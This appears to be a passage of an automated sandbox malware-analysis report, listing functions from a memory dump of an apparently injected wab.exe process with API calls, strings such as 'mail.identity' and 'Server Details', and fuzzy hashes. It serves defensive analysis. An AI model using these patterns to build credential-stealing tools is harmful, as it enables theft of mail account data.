                  • Source File: 0000000C.00000002.1833633512.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                  Similarity
                  • API ID: memset$memcpy
                  • String ID:
                  • API String ID: 368790112-0
                  • Opcode ID: e33439cddf26871f1b6b72d3f102fac71f305b2afc07238da9e6d18acb06c1a9
                  • Instruction ID: 0e4d5a8aef3e538851842ff93af65fc880b0f2046ec3e537946e92548d274f73
                  • Opcode Fuzzy Hash: e33439cddf26871f1b6b72d3f102fac71f305b2afc07238da9e6d18acb06c1a9
                  • Instruction Fuzzy Hash: BB2162B650115DABDF11EE68CD41EDE77ACDF95304F0040A6B708E3151D2749F448B64
                  APIs
                  Memory Dump Source
                  • Source File: 0000000C.00000002.1833633512.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                  Similarity
                  • API ID: memset$memcpy
                  • String ID:
                  • API String ID: 368790112-0
                  • Opcode ID: b4e43ced28bb4930618584d198fe59dd62a49c5b1c6a4db04c735ab4a5314c67
                  • Instruction ID: 358c417c53aa398974aae77e4359fd90ac0a4dba5340dfd55ca125e4bb0c9b0b
                  • Opcode Fuzzy Hash: b4e43ced28bb4930618584d198fe59dd62a49c5b1c6a4db04c735ab4a5314c67
                  • Instruction Fuzzy Hash: 8E01D8B5A40B406BE235AE25CC03F2AB3A8DF91714F400A2EF692676C1D7B8F509915D
                  APIs
                  • __allrem.LIBCMT ref: 00425850
                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00425885
                  • __allrem.LIBCMT ref: 00425933
                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0042597B
                  Memory Dump Source
                  • Source File: 0000000C.00000002.1833633512.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                  Similarity
                  • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                  • String ID:
                  • API String ID: 1992179935-0
                  • Opcode ID: eeae426aa4a2dd52bce4edc8b714b0ba45551b1196620555c2276823dfb77c6c
                  • Instruction ID: 2fc5b562d87482ee0bf7138f77baf3e4365ffd42061eb2d4d5abd72185a9e376
                  • Opcode Fuzzy Hash: eeae426aa4a2dd52bce4edc8b714b0ba45551b1196620555c2276823dfb77c6c
                  • Instruction Fuzzy Hash: C96180B1A00A29DFCF149B64D840AAEB7B1FF45320F68815AE548AB391D7389D81CF19
                  APIs
                  Strings
                  • variable number must be between ?1 and ?%d, xrefs: 0042C5C2
                  • too many SQL variables, xrefs: 0042C6FD
                  Memory Dump Source
                  • Source File: 0000000C.00000002.1833633512.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                  Similarity
                  • API ID: memset
                  • String ID: too many SQL variables$variable number must be between ?1 and ?%d
                  • API String ID: 2221118986-515162456
                  • Opcode ID: 60d5f5fef70a29d847aa1be0b0a9f40863d4de5ddd7e716af81dbeaf9fd2ce2b
                  • Instruction ID: 69d39437184f158b69242413db2932325e78deb4f0df02558d14bae7a1bb2b74
                  • Opcode Fuzzy Hash: 60d5f5fef70a29d847aa1be0b0a9f40863d4de5ddd7e716af81dbeaf9fd2ce2b
                  • Instruction Fuzzy Hash: 93518B31B00626EFDB29DF68D481BEEB7A4FF09304F50016BE811A7251D779AD51CB88
                  APIs
                    • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000,?,?,00000400,00000001), ref: 004026E4
                  • memset.MSVCRT ref: 004026AD
                    • Part of subcall function 004108E5: UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410902
                    • Part of subcall function 004108E5: UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410923
                    • Part of subcall function 004108E5: memcpy.MSVCRT ref: 00410961
                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000002,?,0000007F,00000000,00000000,00000002,00000000,?), ref: 0040279C
                  • LocalFree.KERNEL32(?), ref: 004027A6
                  Memory Dump Source
                  • Source File: 0000000C.00000002.1833633512.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                  Similarity
                  • API ID: ByteCharFromMultiStringUuidWide$FreeLocalQueryValuememcpymemset
                  • String ID:
                  • API String ID: 1593657333-0
                  • Opcode ID: f86a270f64af7f2cfe52cb4533637fefaa5bfeff9622a9a4a07cc31b63cb9060
                  • Instruction ID: aa14e43d8b473801bf9d2631992dc1640396fa6537153de3cc175e43cdbeb3f4
                  • Opcode Fuzzy Hash: f86a270f64af7f2cfe52cb4533637fefaa5bfeff9622a9a4a07cc31b63cb9060
                  • Instruction Fuzzy Hash: 0B4183B1408384BFD711DB60CD85AAB77D8AF89314F044A3FF998A31C1D679DA44CB5A
                  APIs
                  • memset.MSVCRT ref: 0040C922
                  • SendMessageA.USER32(00000000,00000423,00000000,00000000), ref: 0040C966
                  • GetMenuStringA.USER32(?,00000103,?,0000004F,00000000), ref: 0040C980
                  • PostMessageA.USER32(?,00000402,00000000,00000000), ref: 0040CA23
                  Memory Dump Source
                  • Source File: 0000000C.00000002.1833633512.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                  Similarity
                  • API ID: Message$MenuPostSendStringmemset
                  • String ID:
                  • API String ID: 3798638045-0
                  • Opcode ID: baefdefab252ba5ebdbc5dbfb72098888a57285fb2abb1b9f47d437d3554fda2
                  • Instruction ID: 1bc0f942f430aed347c7303033341c470b8779a554354b53929018aa447f6f2a
                  • Opcode Fuzzy Hash: baefdefab252ba5ebdbc5dbfb72098888a57285fb2abb1b9f47d437d3554fda2
                  • Instruction Fuzzy Hash: A241D071600215EBCB24CF24C8C5B97B7A4BF05325F1483B6E958AB2D2C3789D81CBD8
                  APIs
                    • Part of subcall function 00409DED: ??2@YAPAXI@Z.MSVCRT ref: 00409E0E
                    • Part of subcall function 00409DED: ??3@YAXPAX@Z.MSVCRT ref: 00409ED5
                  • strlen.MSVCRT ref: 0040B60B
                  • atoi.MSVCRT ref: 0040B619
                  • _mbsicmp.MSVCRT ref: 0040B66C
                  • _mbsicmp.MSVCRT ref: 0040B67F
                  Memory Dump Source
                  • Source File: 0000000C.00000002.1833633512.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                  Similarity
                  • API ID: _mbsicmp$??2@??3@atoistrlen
                  • String ID:
                  • API String ID: 4107816708-0
                  • Opcode ID: 481fecb55ebe7fb47740a6b69fad8160bec1c4c1e9b6d2800cf49c311f8ba602
                  • Instruction ID: e44d10e2ba05df3f3c4ea20365ac2b40f6a529c5f902ff1350b2aa0f2f7d2ce1
                  • Opcode Fuzzy Hash: 481fecb55ebe7fb47740a6b69fad8160bec1c4c1e9b6d2800cf49c311f8ba602
                  • Instruction Fuzzy Hash: 3A413D35900204EFCF10DFA9C481AA9BBF4FF48348F1144BAE815AB392D739DA41CB99
                  APIs
                  Memory Dump Source
                  • Source File: 0000000C.00000002.1833633512.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                  Similarity
                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@_gmtime64memcpystrftime
                  • String ID:
                  • API String ID: 1886415126-0
                  • Opcode ID: 2c8248469399fbf04d0dbf47d68c6bd2d8f4f823657728d056fdecfbecaff4db
                  • Instruction ID: 0fc2308174198aa020173da426f8fce31fb0284c5be342abf897f659f69a0370
                  • Opcode Fuzzy Hash: 2c8248469399fbf04d0dbf47d68c6bd2d8f4f823657728d056fdecfbecaff4db
                  • Instruction Fuzzy Hash: 6F21E472A013145BD320EB69C846B5BB7D8AF44734F044A1FFAA8D73D1D738E9448699
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000002.1833633512.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                  Similarity
                  • API ID: strlen
                  • String ID: >$>$>
                  • API String ID: 39653677-3911187716
                  • Opcode ID: fe8035a2bc0feec0fd3c25fdeb621276a2bec91dd981480682d5a40b5cd82bd5
                  • Instruction ID: 00f684ae2741cafacb4c0f359147db44c9a3c2c025b4d94400920e38b4f60055
                  • Opcode Fuzzy Hash: fe8035a2bc0feec0fd3c25fdeb621276a2bec91dd981480682d5a40b5cd82bd5
                  • Instruction Fuzzy Hash: E131261180D6C4AEEB11CFA880463EEFFB05FA2304F5886DAD0D047743C67C964AC3AA
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000002.1833633512.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                  Similarity
                  • API ID: memcpy
                  • String ID: @
                  • API String ID: 3510742995-2766056989
                  • Opcode ID: 5364360adcdec80b12010bd2de721da4a734fa53c949916e07c670fac02dc71b
                  • Instruction ID: 6d1199ef97cb2679a5b3fe4a4c98cea7b7ae300cfbacc21e3dff9814a3884c4c
                  • Opcode Fuzzy Hash: 5364360adcdec80b12010bd2de721da4a734fa53c949916e07c670fac02dc71b
                  • Instruction Fuzzy Hash: 41113DB2E007046BDB288E96DC80D5A77A8EFA0354700013FFE06662D1F639EA5DC7D8
                  APIs
                  • strlen.MSVCRT ref: 0040797A
                  • ??3@YAXPAX@Z.MSVCRT ref: 0040799A
                    • Part of subcall function 00406F30: malloc.MSVCRT ref: 00406F4C
                    • Part of subcall function 00406F30: memcpy.MSVCRT ref: 00406F64
                    • Part of subcall function 00406F30: ??3@YAXPAX@Z.MSVCRT ref: 00406F6D
                  • ??3@YAXPAX@Z.MSVCRT ref: 004079BD
                  • memcpy.MSVCRT ref: 004079DD
                  Memory Dump Source
                  • Source File: 0000000C.00000002.1833633512.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                  Similarity
                  • API ID: ??3@$memcpy$mallocstrlen
                  • String ID:
                  • API String ID: 1171893557-0
                  • Opcode ID: defd1bd1be5bbd5284309495682469d6dd103d7cb5d76ad0db5bff9d1363c284
                  • Instruction ID: 28856836b01dc1c1490a34e4127c9d88e875caa212a522c6554fbe506b42c8ef
                  • Opcode Fuzzy Hash: defd1bd1be5bbd5284309495682469d6dd103d7cb5d76ad0db5bff9d1363c284
                  • Instruction Fuzzy Hash: A211CDB1604600EFD720DF18D880E9AB7F5EF48328B108A2EE852A76D1C735F8158B59
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000002.1833633512.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                  Similarity
                  • API ID: _strcmpi
                  • String ID: C@$mail.identity
                  • API String ID: 1439213657-721921413
                  • Opcode ID: 4271e50fa9e0cb48d23f84e20e6912c8f7ba64196effffc20a844cddd1a4c075
                  • Instruction ID: e081b0b03caa8c584547328dd3c7b46ba64ccdb110812537a35def5e1e6d8c92
                  • Opcode Fuzzy Hash: 4271e50fa9e0cb48d23f84e20e6912c8f7ba64196effffc20a844cddd1a4c075
                  • Instruction Fuzzy Hash: DD110A325002199BEB20AA65DC41E8A739CEF00358F10453FF545B6182EF38F9598B98
                  APIs
                  • memset.MSVCRT ref: 00406640
                    • Part of subcall function 004063B2: memset.MSVCRT ref: 0040644F
                    • Part of subcall function 004063B2: memcpy.MSVCRT ref: 00406462
                    • Part of subcall function 004063B2: memcpy.MSVCRT ref: 00406475
                  • memcmp.MSVCRT ref: 00406672
                  • memcpy.MSVCRT ref: 00406695
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000002.1833633512.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                  Similarity
                  • API ID: memcpy$memset$memcmp
                  • String ID: Ul@
                  • API String ID: 270934217-715280498
                  • Opcode ID: ff49a6b21300bdc1e28d83de90f780c1e5e431fdc449c6fd399a747e7733bd1d
                  • Instruction ID: 50cfa42ee3f36d69bd2a91aaf20a03d2fa08f341615043147a7a382cdea3e611
                  • Opcode Fuzzy Hash: ff49a6b21300bdc1e28d83de90f780c1e5e431fdc449c6fd399a747e7733bd1d
                  • Instruction Fuzzy Hash: 46017572A0020C6BEB10DAA58C06FEF73ADAB44705F450436FE49F2181E679AA1987B5
                  APIs
                    • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408E7F
                    • Part of subcall function 00408DB6: memcpy.MSVCRT ref: 00408EBE
                  • sprintf.MSVCRT ref: 0040B929
                  • SendMessageA.USER32(?,00000401,00000000,?), ref: 0040B98C
                    • Part of subcall function 00408DB6: _mbscpy.MSVCRT ref: 00408E31
                    • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                  • sprintf.MSVCRT ref: 0040B953
                  • _mbscat.MSVCRT ref: 0040B966
                  Memory Dump Source
                  • Source File: 0000000C.00000002.1833633512.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                  Similarity
                  • API ID: sprintf$LoadMessageSendString_mbscat_mbscpymemcpystrlen
                  • String ID:
                  • API String ID: 203655857-0
                  • Opcode ID: e7a96a4b3b60773b868b861c6ef1878d2d31708076d5e2e16fac633899c29946
                  • Instruction ID: 0d6227c2dffbdb2154d3321facad49e181a647ebd34d8d5e6c5aab0b846496ed
                  • Opcode Fuzzy Hash: e7a96a4b3b60773b868b861c6ef1878d2d31708076d5e2e16fac633899c29946
                  • Instruction Fuzzy Hash: EE0117B2500308A6E721EB75DC87FE773ACAB54704F04046AB659B61C3DA78E5444A59
                  APIs
                  Memory Dump Source
                  • Source File: 0000000C.00000002.1833633512.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                  Similarity
                  • API ID: ??3@
                  • String ID:
                  • API String ID: 613200358-0
                  • Opcode ID: 95fe0c5ee96a68655d96064396ecbffa5b8939de9cee66978f58e17f988e32ec
                  • Instruction ID: 5841ab7dcc50b440abd9236b7832042a9d7d1d7b8957bb774bcacf87f05c1f29
                  • Opcode Fuzzy Hash: 95fe0c5ee96a68655d96064396ecbffa5b8939de9cee66978f58e17f988e32ec
                  • Instruction Fuzzy Hash: AAE046A134974456BA10AF7BAC52F13239CEA803523168C6FB800F36D2EF2CE890846C
                  APIs
                    • Part of subcall function 004176F4: memcmp.MSVCRT ref: 004177B6
                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00418726
                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00418770
                  Strings
                  • recovered %d pages from %s, xrefs: 004188B4
                  Memory Dump Source
                  • Source File: 0000000C.00000002.1833633512.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                  Similarity
                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$memcmp
                  • String ID: recovered %d pages from %s
                  • API String ID: 985450955-1623757624
                  • Opcode ID: 9d09b39b818056697e6918b79f21f12d68d35230e64058568acdb5651893ba04
                  • Instruction ID: 98aa3c95e39363207900286e283e4ca218167c091a2ac8f6aa08d387a6555cb7
                  • Opcode Fuzzy Hash: 9d09b39b818056697e6918b79f21f12d68d35230e64058568acdb5651893ba04
                  • Instruction Fuzzy Hash: BA81AF759006049FDB25DBA8C880AEFB7F6EF84324F25441EE95597381DF38AD82CB58
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000002.1833633512.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                  Similarity
                  • API ID: _ultoasprintf
                  • String ID: %s %s %s
                  • API String ID: 432394123-3850900253
                  • Opcode ID: 16242442a3dc2496cbd1affae0ffec3615c5459b66bdf10bcc66490599bfb82e
                  • Instruction ID: 5b4e28b1b4fc8494891684f3550fd3cb18a3cec27640a2844273e51cea36df92
                  • Opcode Fuzzy Hash: 16242442a3dc2496cbd1affae0ffec3615c5459b66bdf10bcc66490599bfb82e
                  • Instruction Fuzzy Hash: 80412331504A15C7C93595648B8DBEBA3A8BB46300F5804BFDCAAB32C0D3FCAD42865E
                  APIs
                  • memset.MSVCRT ref: 00409919
                  • SendMessageA.USER32(N\@,00001019,00000000,?), ref: 00409948
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000002.1833633512.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                  Similarity
                  • API ID: MessageSendmemset
                  • String ID: N\@
                  • API String ID: 568519121-3851889168
                  • Opcode ID: 2010a019ef781dd6939f17f8e62f95d5074ac9a6fd296138cb71cbff55b3af76
                  • Instruction ID: 8500237f8b168207f1c9a25e89cff2ec53edf3448a21c69821c5a9264d9502ca
                  • Opcode Fuzzy Hash: 2010a019ef781dd6939f17f8e62f95d5074ac9a6fd296138cb71cbff55b3af76
                  • Instruction Fuzzy Hash: 3C016279800205AADB209F59C845AEBB7F8FF85B45F00802DE894B6241D374A945CB79
                  APIs
                  • LoadMenuA.USER32(00000000), ref: 00409078
                  • sprintf.MSVCRT ref: 0040909B
                    • Part of subcall function 00408F1B: GetMenuItemCount.USER32(?), ref: 00408F31
                    • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408F55
                    • Part of subcall function 00408F1B: GetMenuItemInfoA.USER32(?), ref: 00408F8B
                    • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408FB8
                    • Part of subcall function 00408F1B: strchr.MSVCRT ref: 00408FC4
                    • Part of subcall function 00408F1B: _mbscat.MSVCRT ref: 0040901F
                    • Part of subcall function 00408F1B: ModifyMenuA.USER32(?,?,00000400,?,?), ref: 0040903B
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000002.1833633512.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                  Similarity
                  • API ID: Menu$Itemmemset$CountInfoLoadModify_mbscatsprintfstrchr
                  • String ID: menu_%d
                  • API String ID: 1129539653-2417748251
                  • Opcode ID: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                  • Instruction ID: bbc3668ae8aad1463aedfde5e5dd5b48340f77aa4c3989790123ead7330def9b
                  • Opcode Fuzzy Hash: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                  • Instruction Fuzzy Hash: 2ED0C260A4124036EA2023366C0AF4B1A099BC271AF14022EF000B20C3EBFC844482BE
                  APIs
                  Strings
                  • failed memory resize %u to %u bytes, xrefs: 00411706
                  Memory Dump Source
                  • Source File: 0000000C.00000002.1833633512.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                  Similarity
                  • API ID: _msizerealloc
                  • String ID: failed memory resize %u to %u bytes
                  • API String ID: 2713192863-2134078882
                  • Opcode ID: b5cbcb03e4e476f93ec765dc128528ecfd056f92ca38a68215b2957d827f1bcd
                  • Instruction ID: 6d708a2afe7937de994116278d2c06faa365a3e4d7322368aba5da3f7b150b0b
                  • Opcode Fuzzy Hash: b5cbcb03e4e476f93ec765dc128528ecfd056f92ca38a68215b2957d827f1bcd
                  • Instruction Fuzzy Hash: DBD0C2329092107EEB152250AC03B5FAB51DB80374F25850FF658451A1E6795C108389
                  APIs
                    • Part of subcall function 00406F96: GetModuleFileNameA.KERNEL32(00000000,00000104,00000104,00409805,00000000,00409723,?,00000000,00000104), ref: 00406FA1
                  • strrchr.MSVCRT ref: 00409808
                  • _mbscat.MSVCRT ref: 0040981D
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000002.1833633512.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                  Similarity
                  • API ID: FileModuleName_mbscatstrrchr
                  • String ID: _lng.ini
                  • API String ID: 3334749609-1948609170
                  • Opcode ID: 98f2440ea2097efbff780d18735bc8e6eaa27cf1360ec9cb317463341ca83b29
                  • Instruction ID: 627d3aba04136714d7c1818045af5338c576ea1e6c84acb30438f8bc90b354f8
                  • Opcode Fuzzy Hash: 98f2440ea2097efbff780d18735bc8e6eaa27cf1360ec9cb317463341ca83b29
                  • Instruction Fuzzy Hash: 73C080019497D018F12235212D03F4F06884F83709F34005FF801796C3EF9CA611407F
                  APIs
                  • _mbscpy.MSVCRT ref: 004070EB
                    • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                    • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                  • _mbscat.MSVCRT ref: 004070FA
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000002.1833633512.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                  Similarity
                  • API ID: _mbscat$_mbscpystrlen
                  • String ID: sqlite3.dll
                  • API String ID: 1983510840-1155512374
                  • Opcode ID: 630fb5f27daad17d498a2939fbb1447296fc35da86cfe41959fb393c0c6f0023
                  • Instruction ID: ab8058c300e11a65186fba7fca0927c942ef8f40a12134081a956aaad4b84faf
                  • Opcode Fuzzy Hash: 630fb5f27daad17d498a2939fbb1447296fc35da86cfe41959fb393c0c6f0023
                  • Instruction Fuzzy Hash: 42C0803340517035770276717D03A9F794DCF81355B01045AF54451112F529891241EB
                  APIs
                  • GetPrivateProfileStringA.KERNEL32(Server Details,?,0044C52F,A4@,0000007F,?), ref: 004033C8
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000002.1833633512.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                  Similarity
                  • API ID: PrivateProfileString
                  • String ID: A4@$Server Details
                  • API String ID: 1096422788-4071850762
                  • Opcode ID: 55c4497567308b46e508750365dc53e52d0a25bfb23d4dcbdca40916d4ea9269
                  • Instruction ID: 3fa8da6ebb007cc1aa22036e73777017e29eb1af1cc7e931feee2a89adc62c4b
                  • Opcode Fuzzy Hash: 55c4497567308b46e508750365dc53e52d0a25bfb23d4dcbdca40916d4ea9269
                  • Instruction Fuzzy Hash: C8C08C32189301BAEA418F80AD46F0EBBA2EBA8B00F044409B244200A682B94020EF17
                  APIs
                  Memory Dump Source
                  • Source File: 0000000C.00000002.1833633512.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                  Similarity
                  • API ID: memcpy$memset
                  • String ID:
                  • API String ID: 438689982-0
                  • Opcode ID: 3e8938812e192c77fa2f1ca69e9b365f101ee6c3f919cceff69a24fa811216df
                  • Instruction ID: 02088d5bd302ba8124152156f4c24fba1fa2279ed4138068a4a2dd0dfc44ef6b
                  • Opcode Fuzzy Hash: 3e8938812e192c77fa2f1ca69e9b365f101ee6c3f919cceff69a24fa811216df
                  • Instruction Fuzzy Hash: BC61BDB2604712AFD710DF65E8C1B2BB7E5FF84304F40892EF99896250D338E955CB9A
                  APIs
                  Memory Dump Source
                  • Source File: 0000000C.00000002.1833633512.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                  Similarity
                  • API ID: FreeLocalmemcpymemsetstrlen
                  • String ID:
                  • API String ID: 3110682361-0
                  • Opcode ID: 603dab700e6bd2bbd406faeee6bfbbd01979f456a647da946a7e0cb9a238772f
                  • Instruction ID: 01a4a4a03dd67d82f411e1dd6e1cb40c430aa3add0a741e9cb7308dd065d79ab
                  • Opcode Fuzzy Hash: 603dab700e6bd2bbd406faeee6bfbbd01979f456a647da946a7e0cb9a238772f
                  • Instruction Fuzzy Hash: A331E572D0011DABDB10DB68CD81BDEBBB8EF55314F1005BAE944B7281DA38AE858B94
                  APIs
                  Memory Dump Source
                  • Source File: 0000000C.00000002.1833633512.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                  Similarity
                  • API ID: memcpy
                  • String ID:
                  • API String ID: 3510742995-0
                  • Opcode ID: 382e58b0fa3d8fe0cb6053be8dd65ba46c4ee018798b4ba153f9c1234f43a83e
                  • Instruction ID: 2ace43f3ece935e7cd0bce4b95d7f51bbc88ae08637005f1eff78ef908a12d17
                  • Opcode Fuzzy Hash: 382e58b0fa3d8fe0cb6053be8dd65ba46c4ee018798b4ba153f9c1234f43a83e
                  • Instruction Fuzzy Hash: 4B1189B3E002186BEB00EFA5DC49EDEB7ACEB59311F454536FA05DB141E634E648C7A8
                  APIs
                  Memory Dump Source
                  • Source File: 0000000C.00000002.1833633512.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                  Similarity
                  • API ID: ??2@$memset
                  • String ID:
                  • API String ID: 1860491036-0
                  • Opcode ID: c78329486846fe93a7256add11836ddf78ca18624f4c1b8479d66424083257ec
                  • Instruction ID: ded700a689dc4ea077b1bf28e8ae47d2b9e76a7afd7a7e1dd26f08861e755b16
                  • Opcode Fuzzy Hash: c78329486846fe93a7256add11836ddf78ca18624f4c1b8479d66424083257ec
                  • Instruction Fuzzy Hash: 0B21B6B0A547508EE7558F6A9845A16FAE4FFD0710726C8AFD109DB2B2E7B8D8408F14